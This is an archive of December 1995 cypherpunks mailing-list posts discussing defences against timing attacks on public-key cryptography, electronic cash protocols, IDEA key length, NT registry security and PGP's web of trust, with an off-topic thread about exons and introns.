From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 13 Dec 1995 16:29:47 +0800
To: cypherpunks@toad.com
Subject: Re: Potential defense against timing attack on Diffie-Hellman
Message-ID: <199512130743.XAA25025@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Follow-on defense for low-memory smartcards:  This is a bit ugly
and I'm not sure how much it protects your information, but it's some
help for systems that can't store 1024 partial products 1024 bits long,
which smartcards generally can't be expected to do :-)

Pick k random values K1, K2, .. Kk, where k is some medium-sized number; 
probably about 10 though maybe more would be better.
Calculate Y[i] = Y**2**i, i=1...log x, as before, but instead of calculating
        r[i] = r[i-1] or r[i-1]*Y[i], i=1...logx,
calculate separate subproducts for i={1...K1}, {K1+1...K2}, ... {Kk...logx},
and then multiply those subproducts together.  The easy way to do this is
keep second running product P, and whenever you reach Kj, set P = P*r[i],
and set r[i]=1 for the next round of (Kj)+1...K(j+1).  You still need to
calculate r[i-1]*Y[i] whether you're using it or not.

For added obnoxiousness, at the cost of about 50% more calculation, you could
calculate Yinv = Y**-1 mod m, and calculate r[i] and Y**i for i = 1...Kj, 
calculate through Y[logx] ignoring the r[]s, and then calculate r[i]
and Y[logx] * Yinv**[logx-i] for i=logx....Kj+1.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp (ecarp@netcom.com)" <ecarp@netcom.com>
Date: Wed, 13 Dec 1995 16:39:24 +0800
To: Matthias Schunter <WWW-BUYINFO@allegra.att.com
Subject: Re: e-Cash: CAFE vs. Mondex
Message-ID: <199512130705.BAA22782@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Tue, 12 Dec 1995 11:34:58 +0100
> To:            David Klur <dklur@dttus.com>
> From:          Matthias Schunter <schunter@informatik.uni-hildesheim.de>
> Subject:       Re: e-Cash: CAFE vs. Mondex
> Cc:            pfitzb@informatik.uni-hildesheim.de, WMI@ZURICH.IBM.COM,
>                cypherpunks@toad.com, WWW-BUYINFO@allegra.att.com

> Dear Mr. Klur,
> 
> 
> I'm member of the CAFE consortium but I can not answer your question.
> As far as we know, the details of the Mondex protocols are still 
> confidential (or only available under a non-disclosure license). 

Oh, I see.  Is this another one of those "we won't let you make sure 
that your money is safe with us, you'll just have to trust us" sort 
of things?

Security through obscurity was never a very strong selling suit, 
especially to those who know that STO very likely hides a very weak 
encryption/authentication scheme.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 13 Dec 1995 15:17:37 +0800
To: cypherpunks@toad.com
Subject: The Elevator Problem (a.k.a. build a private key in public)
Message-ID: <9512130511.AA25229@all.net>
MIME-Version: 1.0
Content-Type: text


Alice: tell Bob your public key
Bob: use Alice's public key to encrypt a random number and tell it to everyone

Now: start communicating using the random number as a private key.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp (ecarp@netcom.com)" <ecarp@netcom.com>
Date: Thu, 14 Dec 1995 17:40:38 +0800
To: "Perry E. Metzger" <cypherpunks@toad.com
Subject: Re: Jim Quinn interview of James Norman (edited)
Message-ID: <199512130722.BAA23513@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> To:            ecarp@netcom.com
> Cc:            cypherpunks@toad.com
> Subject:       Re: Jim Quinn interview of James Norman (edited) 
> Reply-to:      perry@piermont.com
> Date:          Tue, 12 Dec 1995 14:53:14 -0500
> From:          "Perry E. Metzger" <perry@piermont.com>

> 
> According to the headers, you, Mr. Carp, forwarded this to
> Cypherpunks, when it was obviously available to those that wanted to
> read it on a variety of other mailing lists.
> 
> Please don't continue doing this.
> 
> Jon Roland writes:
> > The following is a Radio Interview between James Norman, 
> > formerly Senior Editor of Forbes Magazine and now with Media 
> > Bypass Magazine and Jim Quinn, DJ of WRRK 96.9 FM in Pittsburgh. 
> > In this interview from December 7th, they discuss issues of 
> > national importance and STUNNING IMPACT. Essentially they give 
> > out the reason for Vincent Foster's Death, and the fact that 
> > the "resignations" of the Congresspersons are NOT for policy 
> > reasons but because they have been caught with millions in 
> > corrupt funds in Swiss Banks. Read this to learn what the 
> > "mainstream media" doesn't ever tell you... 

Unfortunately, even I sometimes hit the wrong button on my mailer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc Ramirez <mrami@mramirez.sy.yale.edu>
Date: Wed, 13 Dec 1995 15:05:57 +0800
To: "Ed Carp (ecarp@netcom.com>
Subject: Re: EXON
In-Reply-To: <199512122017.OAA20584@khijol>
Message-ID: <Pine.BSF.3.91.951212235421.4704A-100000@mramirez.sy.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Dec 1995, Ed Carp (ecarp@netcom.com) wrote:

> > From:          Rich Graves <llurch@networking.stanford.edu>
> >
> > (There is some controversy in molecular biology circles as to whether 
> > "junk DNA" is really "junk" just because it doesn't build proteins. It 
> > could perform a regulatory or "frame-check" function.)
> 
> Actually, I think that once the matter is further studied, scientists 
> will discover that the "junk DNA" is not junk, but inactive DNA, 
> waiting for a "trigger".

Well, there are a couple of interesting things:

	o mutations in non-coding sequences are known to cause certain
	  flavors of cancer, and

	o the amount of redundancy in exons is rather high in comparison
	  to the coding sequences (much like other Exons we know :),
	  approaching that of other naturally arising degradation-resistant
	  signals, such as human language. 

So the signs as of right now are definitely pointing to exons having some 
purpose.  The problem is that exons usually lay outside the start and 
stop sequences, so nobody knows how they are read, which makes it hard to 
give them an interpretation.

Marc.

ObCrypto: Store your private key in your non-coding DNA?  If we all did
that would the Red Cross become the national voluntary key escrow agent? 
Would that actually be good because then they would mislabel all they keys
and destroy half of the lot in the process of collection? If cancerous 
cells had PGP keys, would the immune system destroy them or just detain 
them for a really long time until they withered away of malnutrition and 
stress?  Should I go to bed?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Wed, 13 Dec 1995 16:46:41 +0800
To: mrami@minerva.cis.yale.edu
Subject: Re: EXON
In-Reply-To: <Pine.BSF.3.91.951212235421.4704A-100000@mramirez.sy.yale.edu>
Message-ID: <Pine.LNX.3.91.951213001004.2163B-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 13 Dec 1995, Marc Ramirez wrote:

> Date: Wed, 13 Dec 1995 00:21:32 -0500 (EST)
> From: Marc Ramirez <mrami@mramirez.sy.yale.edu>
> To: "Ed Carp (ecarp@netcom.com)" <ecarp@netcom.com>
> Cc: Rich Graves <llurch@networking.stanford.edu>,
>     High Society List <cypherpunks@toad.com>
> Subject: Re: EXON
> 
> On Tue, 12 Dec 1995, Ed Carp (ecarp@netcom.com) wrote:
> 
> > > From:          Rich Graves <llurch@networking.stanford.edu>
> > >
> > > (There is some controversy in molecular biology circles as to whether 
> > > "junk DNA" is really "junk" just because it doesn't build proteins. It 
> > > could perform a regulatory or "frame-check" function.)
> > 
> > Actually, I think that once the matter is further studied, scientists 
> > will discover that the "junk DNA" is not junk, but inactive DNA, 
> > waiting for a "trigger".
> 
> Well, there are a couple of interesting things:
> 
> 	o mutations in non-coding sequences are known to cause certain
> 	  flavors of cancer, and
> 
> 	o the amount of redundancy in exons is rather high in comparison
> 	  to the coding sequences (much like other Exons we know :),
> 	  approaching that of other naturally arising degradation-resistant
> 	  signals, such as human language. 
> 
> So the signs as of right now are definitely pointing to exons having some 
> purpose.  The problem is that exons usually lay outside the start and 
> stop sequences, so nobody knows how they are read, which makes it hard to 
> give them an interpretation.


folks, say yes to proof reading.

sorry to perpetuate this thread any more but as one of the resident
biochemists/mol biologists i've got an itch to scratch.

in the lines with the single '>' above, you need to replace the word
'exon' with 'intron'.


    exons --> DNA sequences in a gene that (can) yield protein after splicing

    introns --> DNA sequences that are interspersed between exons in a gene


introns have several known roles, including roles in RNA splicing and
RNA editing (a process that sort of skirts the central dogma of 
DNA -> RNA -> protein by changing the 'code' in the RNA).

non-coding sequences represent the bulk of DNA, and for the most part
it's role is unknown although various people have their pet theories.
gene regulation is often carried out by non-coding sequences,
including sequences that are never transcribed into RNA.  thus, they
can be involved in any cancer process.



patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMM6AeE3Qo/lG0AH5AQEwrAQAiVWuSI1nP8AzT6IEQU9yucb/VCkU4V4K
h3LUhnlfBrDsUujI2FbS3jPIh9apVcQ7dy4Di0xYTxUalZ82l6MJqfh+an7S09df
N6SpdgiRweefw2VQQcA5GbMPfaZFdmm5yRbDbuBF9HYlnpY8g63DmDDft7xGg4s8
koeh8v2/KTs=
=uX7u
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Fri, 15 Dec 1995 07:50:45 +0800
To: Tod McQuillin <devin@lm.com>
Subject: Re: PGP/PINE integration
In-Reply-To: <Pine.VUL.3.91.951212215232.25435I-100000@throop.foxholly.com>
Message-ID: <Pine.ULT.3.91.951213014345.22977C-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

For those that dont' need quite this much or don't have access to pine at 
the install level (often for university systems with a central software 
depository), I have a script called PineSign available on my home page 
(or email me) that will allow simple PGP singing of your pine mailings 
and postings.  I doesn't do encryption, but works great for signatures.
For encryption, I usually do that withing filespace anyways where I have 
a little more control over things.

Of course, as with all things UNIX, you use what you find most useful.  
That's why there are 101 ways to do anything. :-)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMM5oxDokqlyVGmCFAQEayAP/V/u020yrCLoM3WhzCYSMYb8pOuh7HOtT
Hnkv5HABS5vwqB9Rv6pl2Z25H9Sfv7js+pOHg+b32A25STW1TbrT15KZ3EegTz86
cErave0aaQpy9ZbO1X409hA10AJHwXFBvGpFSuSH/RPNSPg/raW+oPa8VCmi4gr+
/yk/FH33lfk=
=Rywu
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Thu, 14 Dec 1995 17:42:51 +0800
To: cypherpunks@toad.com
Subject: Re: IDEA encryption
In-Reply-To: <199512130237.VAA21019@charon.MIT.EDU>
Message-ID: <Pine.A32.3.91.951213015449.59778A-100000@hopi.gate.net>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 12 Dec 1995, Derek Atkins wrote:

> > The copy of the source for idea (unix) that I have specify's a user key 
> > length of 8 bytes, but allows this to be increased to something larger. 
> > Will increasing the user keylength improve the overall security? 
> 
> Umm, I think you are confused.  First, IDEA has a keysize of 16 bytes,
> not 8.  Second, it cannot be easily changed.  Sure, your code probably

/******************************************************************************/
/*                                                                            */
/* I N T E R N A T I O N A L  D A T A  E N C R Y P T I O N  A L G O R I T H M */
/*                                                                            */
/******************************************************************************/
/* Author:       Richard De Moliner (demoliner@isi.ee.ethz.ch)                */
/*               Signal and Information Processing Laboratory                 */
/*               Swiss Federal Institute of Technology                        */
/*               CH-8092 Zuerich, Switzerland                                 */
/* Created:      April 23, 1992                                               */
/* Changes:      November 16, 1993 (support of ANSI-C and C++)                */
/* System:       SUN SPARCstation, SUN acc ANSI-C-Compiler, SUN-OS 4.1.3      */
/******************************************************************************/
/* Change this type definitions to the representations in your computer.      */

[snipped irrelivant bits]

/******************************************************************************/
/* It is possible to change this values.                                      */

#define Idea_nofRound                 8 /* number of rounds                   */
#define Idea_userKeyLen               8 /* user key length (8 or 
larger)      */

/******************************************************************************/
/* Do not change the lines below.                                             */

#define Idea_dataLen                       4 /* plain-/ciphertext block length*/
#define Idea_keyLen    (Idea_nofRound * 6 + 4) /* en-/decryption key length   */

#define Idea_dataSize       (Idea_dataLen * 2) /* 8 bytes = 64 bits           */
#define Idea_userKeySize (Idea_userKeyLen * 2) /* 16 bytes = 128 bits         */

[end cut out]

So what im reading here is; A) it is possible to change the value of the 
userkeylength, and B) the actual key is (2 * userkeylen) or in the case 
of an 8byte key, 2 * 8bytes = 16 bytes = 128bits.

Maybe im crazy.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Fri, 15 Dec 1995 18:56:29 +0800
To: cypherpunks@toad.com
Subject: simple Unix CPU time quantization functions available
Message-ID: <199512130702.CAA24131@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


I've made available a simple CPU time quantization package that
provides a simple interface to encapsulate code blocks that must
run in a multiple of a coarse-grained "quantized" amount of CPU
time.  It is useful in building various on-line cryptographic
protocols in which an attacker could otherwise learn key information
by observing the time the target takes to perform calculations that
use the secret (c.f., Paul Kocher's recent attacks).

The basic idea is that you can specify a "quantum" such that at the
end of an encapsulated block the CPU will busy-wait until the next
quantum multiple.  Fine-grained (below the quantum) timing information
is thereby denied to the observer (including unprivileged processes on
the same machine).  The code is quick-and-dirty and only runs on
Unix-centric platforms.  Test and use at your own risk.

There are (basically) no restrictions on the use or distribution
of the (very simple) code.

Get it from:
	ftp://research.att.com/dist/mab/quantize.shar

The quantize package is also part of Jack Lacy's cryptolib package (watch
this space for details).

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc Ramirez <mrami@mramirez.sy.yale.edu>
Date: Wed, 13 Dec 1995 16:51:36 +0800
To: zinc <zinc@zifi.genetics.utah.edu>
Subject: Re: EXON
In-Reply-To: <Pine.LNX.3.91.951213001004.2163B-100000@zifi.genetics.utah.edu>
Message-ID: <Pine.BSF.3.91.951213031835.5991A-100000@mramirez.sy.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Dec 1995, zinc wrote:

> sorry to perpetuate this thread any more but as one of the resident
> biochemists/mol biologists i've got an itch to scratch.
> 
> in the lines with the single '>' above, you need to replace the word
> 'exon' with 'intron'.

Oops.  Brain fart.

Sorry.

Marc.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Armadillo Remailer <remailer@armadillo.com>
Date: Wed, 13 Dec 1995 22:37:51 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
Message-ID: <199512131315.HAA01726@monad.armadillo.com>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero <ses@tipper.oit.unc.edu> writes:

>My gut & scribble-on-the-back-of-a-napkin feeling about this class of
>attack is that it could be a problem for smartcards (almost certainly)

Is it a problem to create smartcards that do their calculations in
fixed time? I'd guess it should be easier than on multi-purpose
hardware.

Does the attack work for existing smartcards?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Wed, 13 Dec 1995 21:59:24 +0800
To: jamesd@echeque.com>
Subject: Re: Usability of Cryptography (was Re: More FUD from First Virtual)
In-Reply-To: <199512130722.XAA11947@blob.best.net>
Message-ID: <cknh5WaMc50e02iplN@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.limbo: 12-Dec-95 Re: Usability of Cryptograp.. "James
A. Donald"@echequ (1242*)

> If we stick to a lesser goal -- constancy of identity -- 
> this is not so hard.  In general it is impossible to prove that 
> Bryce is the "real" Bryce, but it is trivial to prove that 
> Bryce is the same Bryce who has a certain Web page, and the
> same Bryce who posted a certain article in archives.

Agreed completely, if you add:

"....unless the person claiming to be Bryce is someone who managed to
steal secret keys from that same Bryce."

Without this clause, it seems to me you're assuming that secret keys (or
other identity-verifying tokens) can't ever be stolen.  Insofar as you
use multiple things (cryptography, IP address, etc.) to identify
someone, you can make it harder to impersonate someone, but each of
these things is ultimately forge-able.  -- NB
--------
Nathaniel Borenstein <nsb@fv.com> (FAQ & PGP key: nsb+faq@nsb.fv.com)
Chief Scientist, First Virtual Holdings

VIRTUAL YELLOW RIBBON==> http://www.netresponse.com/zldf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Wed, 13 Dec 1995 22:33:48 +0800
To: Peter Monta <pmonta@qualcomm.com>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512120056.QAA16055@mage.qualcomm.com>
Message-ID: <IAA03848.199512131330@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <199512120056.QAA16055@mage.qualcomm.com>, Peter Monta writes:
>> Of course, this works against a remote adversary, but not against one
>> on the same machine who can look at actual CPU consumption (which doesn't
>> increase when the target is blocked).
>
>Maybe this is a good reason to spinwait, rather than sleep, until
>the timer expires.  It would be pretty subtle to distinguish that
>from "real" computation.

Across a net it should be hard.  On the same CPU it may be easy.  Some
CPUs with hardware branch prediction keep track of how many branches were
correctly and incorrectly predected.  These registers are not allways
protected, and not allways "made virtual" by the OS.

If your spin wait is of the form:

LOAD #big_number, R1
L1:
DEC R1
BNE L1

(a.k.a "for(i = big_number; i--;) { }")

Then the "number of correctly predicted branches" will go up by approximatly
big_number...

(in all honesty the only CPU I am sure "allows" normal user programs to
see the performance registers is the AMD29xxx series, and that is only
if the OS sets the right bit in the register protection mask.  I know
the P6 has such performance registers, but don't know if they are protected,
and I think the P5 has them, but again I don't know if they are protected.
I think some of the Alpha's have them, but seem to remember them being
protected (and I use to think it was a dumb idea...))




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 13 Dec 1995 23:03:10 +0800
To: remailer@armadillo.com (Armadillo Remailer)
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512131315.HAA01726@monad.armadillo.com>
Message-ID: <199512131439.JAA10842@homeport.org>
MIME-Version: 1.0
Content-Type: text


Armadillo Remailer wrote:

| >My gut & scribble-on-the-back-of-a-napkin feeling about this class of
| >attack is that it could be a problem for smartcards (almost certainly)
| 
| Is it a problem to create smartcards that do their calculations in
| fixed time? I'd guess it should be easier than on multi-purpose
| hardware.

	Not if the fixed time is in weeks.

	If you read the Crypto proceedings, you'll find a number of
papers on using an (untrusted) CPU, such as that in a cash machine, to
aid a smartcard.  This is because the CPUs in smartcards are very
slow.

	Maximchuck, at Bell Labs, has a protocol for Anonymous Credit
Cards which uses pre-chosen private keys between correspondants and a
set of remailers to anonymize credit card transactions with respsect
to a merchant. (The bank still knows who's buying how much, and I
think where.)  Anyway, he freely admits that the reason for private
key work is their cards couldn't handle the public key operations.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <a.brown@nexor.co.uk>
Date: Thu, 14 Dec 1995 19:49:21 +0800
To: cypherpunks@toad.com
Subject: Re: NT Password Security Update.  Registry values changed!
In-Reply-To: <2.2b7.32.19951213071131.00316644@netcom14.netcom.com>
Message-ID: <30CE9F76.23C7@nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Ted Cabeen wrote:
 
> Well, I did some more research into the NT password security issue and I
> discovered that I can get access to the Security section of the registry

How did you do that?  The SECURITY section is always greyed out and the
operating system will not allow you to change the permissions on it.

If you did indeed gain access to that area then you've probably found a
flaw in the tamperproof capabilities of NT.


- Andy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 13 Dec 1995 23:39:13 +0800
To: schunter@informatik.uni-hildesheim.de (Matthias Schunter)
Subject: Re: e-Cash: CAFE vs. Mondex
In-Reply-To: <v02120d09acf307537019@[147.172.54.29]>
Message-ID: <199512131446.JAA10908@homeport.org>
MIME-Version: 1.0
Content-Type: text


Matthias Schunter wrote:

| The CAFE system is a cheque based system. This means that the
| customer receives an electronic chequebook, where each cheque is
| (blindly) signed by the bank.  
| During each payment the customer has to use one of these signed cheques.

|  privacy-protecting
|    The privacy of the user is protected.

	How do checks protect the privacy of the user?  The bank
knows who is spending how much with whom for each check.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 13 Dec 1995 23:52:08 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <Pine.SUN.3.91.951212231006.5039C-100000@tipper.oit.unc.edu>
Message-ID: <199512131500.KAA01853@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Simon Spero writes:
> Perry - I don't think NTP goes down to the sort of resolution that 
> appeared to be where the signal is here, and for quantisation reasons, I 
> don't think it can work over a public routed internetwork.

The question isn't whether you can really get the timing down as far
as you want, but whether you can use statistics to cut down your
search space sufficiently to make things interesting. I can't say, but
I'm no longer prepared to trust the stuff, being fairly conservative
in what I trust.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 14 Dec 1995 03:42:43 +0800
To: "Josh M. Osborne" <pmonta@qualcomm.com>
Subject: Re: Timing Cryptanalysis Attack
Message-ID: <199512131812.KAA25397@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:30 12/13/95 -0500, Josh M. Osborne wrote:
>In message <199512120056.QAA16055@mage.qualcomm.com>, Peter Monta writes:
>>> Of course, this works against a remote adversary, but not against one
>>> on the same machine who can look at actual CPU consumption (which doesn't
>>> increase when the target is blocked).
>>
>>Maybe this is a good reason to spinwait, rather than sleep, until
>>the timer expires.  It would be pretty subtle to distinguish that
>>from "real" computation.
>
>Across a net it should be hard.  On the same CPU it may be easy.  Some
>CPUs with hardware branch prediction keep track of how many branches were
>correctly and incorrectly predected.  These registers are not allways
>protected, and not allways "made virtual" by the OS.

Of course you can spend the time doing exponentiation of random
(pseudorandom would probably do) numbers, and when the timer pops, longjump
out to return your answer.


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Twain Ecash Support <support@marktwain.com>
Date: Thu, 14 Dec 1995 03:13:34 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Timing Cryptanalysis Attack
Message-ID: <199512131624.KAA20591@admin.starnet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:39 AM 12/13/95 -0500, you wrote:
>Armadillo Remailer wrote:
>
>| >My gut & scribble-on-the-back-of-a-napkin feeling about this class of
>| >attack is that it could be a problem for smartcards (almost certainly)
>| 
>| Is it a problem to create smartcards that do their calculations in
>| fixed time? I'd guess it should be easier than on multi-purpose
>| hardware.
>
>	Not if the fixed time is in weeks.
>
>	If you read the Crypto proceedings, you'll find a number of
>papers on using an (untrusted) CPU, such as that in a cash machine, to
>aid a smartcard.  This is because the CPUs in smartcards are very
>slow.

DigiCash has been aware of the timing problem for years. Especially as it
relates to smartcards, for which you can get timings down to the clock
cycle. Cosequently, both DigiCash's smartcards and DigiCash's Ecash use
fixed timings.

--Lucky at work

--Mark Twain Bank Ecash Support
  Ecash. The secure Internet payment system that protects your privacy.
  <http://www.marktwain.com/ecash.html>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Thu, 14 Dec 1995 00:42:45 +0800
To: cypherpunks@toad.com
Subject: Re: NT Password Security Update.  Registry values changed!
Message-ID: <9512131601.AA04595@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Ted Cabeen wrote:
>  
> > Well, I did some more research into the NT password security issue and I
> > discovered that I can get access to the Security section of the registry 

> How did you do that?  The SECURITY section is always greyed out and the
> operating system will not allow you to change the permissions on it.

> If you did indeed gain access to that area then you've probably found a
> flaw in the tamperproof capabilities of NT.
> - Andy

Andy, do you have Administrator privs on your NT system? I too seem
to have full access to all registry entries, including all under Security.

M$ may have some hidden areas in the registry (security by obscurity),
but I can't see anything that says 'sorry, you can't look here'.

Speaking for myself.


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 14 Dec 1995 06:41:35 +0800
To: cypherpunks@toad.com
Subject: Re: Spotty c'punks service due to network outages
Message-ID: <2.2b7.32.19951213200827.008e63dc@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:35 PM 12/12/95 -0800, you wrote:
>Our network service is going up and down, probably due to the storms
>in San Francisco.  If you see delays, that's the reason why.  As far
>as I know, NSA has not figured out how to control the weather, so it's
>not their fault :-).

This is not just in San Francisco...  Portland, OR has been having some
pretty bad problems with power outages.  (My ISP was offline all last
night.)  I expect that Seattle will be having similar problems due to the
storm front that just went through.

As for the NSA controlling the Weather Orginization...  That only counts as
a successfull attack if they have the Evil Geniuses for a Better Tommorrow
assisting in the attack.  (And they are controlled by at least one computer
group.)  Sorry...  Been catching up on my mail from the Illuminati mailing list.
|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - R. Rococo |   Ignore the man     |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |  alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lyalc@mail.mpx.com.au (lyal collins)
Date: Wed, 13 Dec 1995 10:57:27 +0800
To: cypherpunks@toad.com
Subject: Timing RSA and Certificates worth ??
Message-ID: <m0tPgKo-0006MlC@kyoko.mpx.com.au>
MIME-Version: 1.0
Content-Type: text/plain


oops
Earlier, I said :
>
>My limited mind induces me to think that a certificate become subject to
timing attacks on the RSA private signing key.
>In this case, certificate verification  processes seem flawed and highly
unreliable.

I meant that on-line certificate issuing, notary and similar services where
data is submitted to a system for processing/RSA encryption are subject to
this for of attack.
Parts of the SEPP/STT protocols appear to require this of merchants and
customers.
I retract my comments about ecash/echeques - I'm not sure of the
implications there yet.
As for SEPP/STT - another nail in the coffin, me thinks.
lyal





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 14 Dec 1995 08:16:31 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re:  Blinding against Kocher's timing attacks
Message-ID: <m0tPynk-0008yYC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:27 PM 12/12/95 -0800, you wrote:
>From: ljo@ausys.se (Johansson Lars)
>> Does anyone know whether David Chaum's patent on
>> blind digital signatures extends to this application?
>
>I don't think it would.  Chaum's blinding protocol has one major
>difference: the blinding factor is applied by a different person than
>the one doing the signing.  The purpose of the blinding is different,
>too; in Chaum's case the idea is to end up with a signature which is
>unknown to the signer, while with Kocher's "defensive blinding" the
>signature (or decryption) is an ordinary RSA one, and the blinding is
>just done internally by the signer to randomize the timing.

One thing I haven't heard mentioned would be the possibility of using TWO
blinding factors, by two different people, to blind the unsigned cash.    As
you may know, I'm interested in payee-anonymous systems as well as
payer-anonymous ones, and such a feature might assist in this.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Thu, 14 Dec 1995 06:24:38 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Web O Trust, active attacks against same, etc.  AGAIN.  (was: Usability of Cryptography (was Re: More FUD from First Virtual) )
In-Reply-To: <199512130722.XAA11947@blob.best.net>
Message-ID: <199512132039.NAA14799@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity calling itself "James A. Donald" <jamesd@echeque.com> 
allegedly wrote:
>
> Web of trust is a mess because it attempts to link keys to 
> physical people, which in general cannot be done.
                   *******************************


Do you wish to substantiate this rather brazen assertion?  
I am very sure that PGP public key 0xCC56B2E9 belongs to my
housemate Sebastian Kuzminsky <kuzminsk@colorado.edu>.  Is
there some reason why I should doubt this belief?


Furthermore my mother <rwilcox@mesa5.mesa.colorado.edu>
<0x5E93210D> is very sure that PGP public key 0x617c6db9
belongs to me, and she is very sure that I am a trustworthy
introducer of keys.  Is there some reason why she should
